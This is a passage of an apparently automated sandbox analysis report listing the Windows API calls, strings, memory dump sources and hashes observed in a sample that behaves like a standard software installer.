                                                                                                      • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                                                      • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                                                      • 6F522980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                                                        • Part of subcall function 004099C0: 6F51C400.COMCTL32(0049B628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                                                                      • 6F58CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                                                      • 6F58C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                                                      • 6F58CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                                                                      • 6F520860.COMCTL32(0049B628,00418D1F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MetricsSystem$C400C740F520860F522980
                                                                                                      • String ID:
                                                                                                      • API String ID: 2856677924-0
                                                                                                      • Opcode ID: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                                                                      • Instruction ID: e0b43fe86d74620756cf035266125a11838772e9d6ef4bcae2e69295d5b8951d
                                                                                                      • Opcode Fuzzy Hash: 33c04b7a68779a44c69ffbd8ad79940853ad3b201d45ee57610259a2e4dbeb77
                                                                                                      • Instruction Fuzzy Hash: A11149B1744204BBEB10EBA9DC83F5E73B8DB48704F6044BAB604E72D2DB799D409759
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004837A4), ref: 00483789
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                                      • API String ID: 47109696-2530820420
                                                                                                      • Opcode ID: ae1742725748cd88b87d9fe0d1248e5a5e1a514a3c9083b9a236ca5d7aa17843
                                                                                                      • Instruction ID: 8316402a246994b7737153b66ed252a9f16b12b2be78e08e0fa98e077eb8f510
                                                                                                      • Opcode Fuzzy Hash: ae1742725748cd88b87d9fe0d1248e5a5e1a514a3c9083b9a236ca5d7aa17843
                                                                                                      • Instruction Fuzzy Hash: 0311B1B4704244AADB10FF65CC52B5E7AE9DB41B19F60C87BA400A7282EB38CA05875C
                                                                                                      APIs
                                                                                                      • 73A0A570.USER32(00000000,?,?,00000000), ref: 00494EE9
                                                                                                        • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00494F0B
                                                                                                      • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495489), ref: 00494F1F
                                                                                                      • GetTextMetricsA.GDI32(00000000,?), ref: 00494F41
                                                                                                      • 73A0A480.USER32(00000000,00000000,00494F6B,00494F64,?,00000000,?,?,00000000), ref: 00494F5E
                                                                                                      Strings
                                                                                                      • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494F16
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                       • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                       • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                                                      • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                                      • API String ID: 1435929781-222967699
                                                                                                      APIs
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                                      • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                                      • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                                      • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                                      Similarity
                                                                                                      • API ID: ObjectSelect$Delete$Stretch
                                                                                                      • String ID:
                                                                                                      • API String ID: 1458357782-0
                                                                                                      APIs
                                                                                                      • GetCursorPos.USER32 ref: 004233BF
                                                                                                      • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                                                      • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                                                      • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                                                      • SetCursor.USER32(00000000), ref: 00423423
                                                                                                      Similarity
                                                                                                      • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1770779139-0
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494D0C
                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494D19
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494D26
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                                      • API String ID: 667068680-2254406584
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(02380000,BZ2_bzDecompressInit), ref: 0045D9F5
                                                                                                      • GetProcAddress.KERNEL32(02380000,BZ2_bzDecompress), ref: 0045DA05
                                                                                                      • GetProcAddress.KERNEL32(02380000,BZ2_bzDecompressEnd), ref: 0045DA15
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                                      • API String ID: 190572456-212574377
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,00480D8E), ref: 0042EA45
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA4B
                                                                                                      • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA5C
                                                                                                        • Part of subcall function 0042E9BC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                                                                        • Part of subcall function 0042E9BC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                                                                        • Part of subcall function 0042E9BC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
                                                                                                      • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042EA70
                                                                                                      Similarity
                                                                                                      • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                                                      • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                                      • API String ID: 142928637-2676053874
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F099), ref: 0044C7FB
                                                                                                      • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C80C
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C81C
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                                      • API String ID: 2238633743-1050967733
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                                                                      • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                                                                      • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                      • API String ID: 667068680-222143506
                                                                                                      APIs
                                                                                                      • GetFocus.USER32 ref: 0041B58E
                                                                                                      • 73A0A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
                                                                                                      • 73A14620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
                                                                                                      • 73A3E680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
                                                                                                      • 73A3E680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
                                                                                                      • 73A0A480.USER32(?,?,0041B643,?,?), ref: 0041B636
                                                                                                      Similarity
                                                                                                      • API ID: E680$A14620A480A570Focus
                                                                                                      • String ID:
                                                                                                      • API String ID: 932946509-0
                                                                                                      • Opcode ID: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                                                                      • Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
                                                                                                      • Opcode Fuzzy Hash: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
                                                                                                      • Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
                                                                                                      APIs
                                                                                                      • SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
                                                                                                      • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D4E8,?,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D45A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                                      • API String ID: 1452528299-1580325520
                                                                                                      • Opcode ID: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                                                                      • Instruction ID: bfdb5615fdc952ab51c5d4d36cfcdc52ba3649a349ed7733e19bd606ff263fd4
                                                                                                      • Opcode Fuzzy Hash: 4cfdc77ab01fb36c91946a35bece077a72b39e520f3a0bad4193af408e0f5770
                                                                                                      • Instruction Fuzzy Hash: A6117835A04204ABD731DE95C941A5E76DCDF46306F608077AD0596283D67C6F0A952A
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0041BDE5
                                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 0041BDEF
                                                                                                      • 73A0A570.USER32(00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BDF9
                                                                                                      • 73A14620.GDI32(00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE20
                                                                                                      • 73A14620.GDI32(00000000,0000000C,00000000,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE2D
                                                                                                      • 73A0A480.USER32(00000000,00000000,0041BE73,0000000E,00000000,0041BE6C,?,00000000,0000000C,0000000B,?,?,00000000,?), ref: 0041BE66
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: A14620MetricsSystem$A480A570
                                                                                                      • String ID:
                                                                                                      • API String ID: 1130675633-0
                                                                                                      • Opcode ID: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                                      • Instruction ID: cee0947e7f2791638d7e7c91bd9cc57ffb528c4a132e606019bcc307a049f0f1
                                                                                                      • Opcode Fuzzy Hash: ac68926fe92e1edab0c70053485f8ed6fe458f78b1884b8088fd3f2024b93da0
                                                                                                      • Instruction Fuzzy Hash: 40212C74E046499FEB00EFA9C982BEEB7B4EB48714F10842AF514B7781D7785940CBA9
                                                                                                      APIs
                                                                                                      • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                                      • LocalFree.KERNEL32(007F29F0,00000000,00401B68), ref: 00401ACF
                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,007F29F0,00000000,00401B68), ref: 00401AEE
                                                                                                      • LocalFree.KERNEL32(007F0C38,?,00000000,00008000,007F29F0,00000000,00401B68), ref: 00401B2D
                                                                                                      • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                                      • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3782394904-0
                                                                                                      • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                      • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                                      • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                      • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                                      APIs
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0047E272
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CFF1), ref: 0047E298
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0047E2A8
                                                                                                      • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E2C9
                                                                                                      • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E2DD
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E2F9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Long$Show
                                                                                                      • String ID:
                                                                                                      • API String ID: 3609083571-0
                                                                                                      • Opcode ID: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
                                                                                                      • Instruction ID: 64a3e6c2176d4acc74ea6130292171d5cd043058eec335b926c35577e1896bc6
                                                                                                      • Opcode Fuzzy Hash: f65d960a6ef7549d8abdb9e067b5e5f1b226f2d151c0a96430342ef03e516e78
                                                                                                      • Instruction Fuzzy Hash: DE010CB5651210ABE600D769DE41F66379CAB0D334F0503AAB959DF2E3C729EC009B49
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041A6F0: CreateBrushIndirect.GDI32 ref: 0041A75B
                                                                                                      • UnrealizeObject.GDI32(00000000), ref: 0041B28C
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B29E
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041B2C1
                                                                                                      • SetBkMode.GDI32(?,00000002), ref: 0041B2CC
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041B2E7
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041B2F2
                                                                                                        • Part of subcall function 0041A068: GetSysColor.USER32(?), ref: 0041A072
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                      • String ID:
                                                                                                      • API String ID: 3527656728-0
                                                                                                      • Opcode ID: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                                      • Instruction ID: 5f3c9a08814bcb0dec11b684bd4148c9aa8da507e688bf70d4fc6563dceee2e6
                                                                                                      • Opcode Fuzzy Hash: 040caad6ebeb90478066d2bb7b9115770ac54e43de5888fa90ff69ea82d38fb6
                                                                                                      • Instruction Fuzzy Hash: 7EF0C2B1651501ABCE00FFBAD9CAE4B37A89F043097088057B544DF197C97CD8548B3D
                                                                                                      APIs
                                                                                                        • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                      • ShowWindow.USER32(?,00000005,00000000,00497991,?,?,00000000), ref: 00497762
                                                                                                        • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                        • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                                                                        • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                                      • String ID: .dat$.msg$IMsg$Uninstall
                                                                                                      • API String ID: 3312786188-1660910688
                                                                                                      • Opcode ID: 8060b02bfbd0833a98a3e6243afb85b8b494b7fa2efbfb07078fe99f385005b5
                                                                                                      • Instruction ID: bbf2e7f3574d42a9113524bdb42c94a944b0e97273f2a70b882bd080beededf8
                                                                                                      • Opcode Fuzzy Hash: 8060b02bfbd0833a98a3e6243afb85b8b494b7fa2efbfb07078fe99f385005b5
                                                                                                      • Instruction Fuzzy Hash: 8E318F74A10214AFDB00EF65DC82D6E7BB5EB89318B51847AF800AB392D739BD01CB58
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAEA
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAF0
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB19
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                                      • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                                      • API String ID: 828529508-2866557904
                                                                                                      • Opcode ID: 915f5369749bf1dd2f4e97bc9020bef18acdf07caf1deb2404a0262322aa2bf8
                                                                                                      • Instruction ID: f5c55ae169209784706469d1b6e96428d25835975ad7b3a5622eb1d8c2489c6d
                                                                                                      • Opcode Fuzzy Hash: 915f5369749bf1dd2f4e97bc9020bef18acdf07caf1deb2404a0262322aa2bf8
                                                                                                      • Instruction Fuzzy Hash: 2DF022E078062136E620E2BFACC3F6B498C8FA0725F040436F009EA2C2E92C9900422E
                                                                                                      APIs
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457E64
                                                                                                      • GetExitCodeProcess.KERNEL32(?,00498116), ref: 00457E85
                                                                                                      • CloseHandle.KERNEL32(?,00457EB8,?,?,004586D3,00000000,00000000), ref: 00457EAB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                                      • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                                      • API String ID: 2573145106-3235461205
                                                                                                      • Opcode ID: 575e6b60f34cbf4eff7e6cad29998e42f3eca010a17ab32e5b4d53f7e3c6a35f
                                                                                                      • Instruction ID: 6a931132ee958b8202ab537f65b64b7fb4871f4dbf11571726e28c2ddef09419
                                                                                                      • Opcode Fuzzy Hash: 575e6b60f34cbf4eff7e6cad29998e42f3eca010a17ab32e5b4d53f7e3c6a35f
                                                                                                      • Instruction Fuzzy Hash: 1101A735604704AFDB11EB999D43A1E77A8DB49711F5004B6FC10E73D3D63C9D048618
                                                                                                      APIs
